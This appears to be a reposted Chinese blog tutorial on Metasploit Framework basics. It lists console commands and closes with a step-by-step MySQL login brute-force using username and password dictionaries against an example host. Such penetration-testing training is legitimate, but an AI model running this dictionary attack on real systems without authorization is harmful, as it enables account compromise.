标签:Metasploit 插件 set 测试 渗透 db 模块 mysql 字典
Msf(the Matesploit Framework)基础
漏洞框架 方便强大 框架全球性exp poc 脚本利于测试
术语
运行
cd = back
ls = dir pwd
banner
color
connect 链接一个主机、网络
edit 编辑一个模块
exit 退出控制台
get 获取变量
getg 全局变量
go_pro 进入GUI ····有的版本没有
grep 输出命令
info 查看模块详细信息
irb drop 进脚本模块 ruby
jobs 显示 你使用 的 模块
kill 处理掉一个 项目进程
load 加载一些插件
loadpath 插件路径
quit 退出控制台
route 做跳板代理
save 保存活跃数据
search 搜索漏洞模块
sessions 选择会话 -i x (shell 反弹回来 选择序号)
set 设置 参数 RHOSTS 地址/网段
- 设置字典
unset
unsetg 全局重新设置
show options 查看配置选项
exploit 执行
db_connect 链接
db_disconnect 断开
db_export 导出
db_import 导入
db_nmap 扫描结果入库
service postgresql start
status
service metasploit start
msfconsole
- 扫描结果
msfconsole
search mysql
use auxiliary/scanner/mysql/mysql_login
set RHOST 192.168.10.3
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)
run 启动攻击,开始爆破
标签:Metasploit,插件,set,测试,渗透,db,模块,mysql,字典 来源: https://blog.csdn.net/qq_33608000/article/details/122510354
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。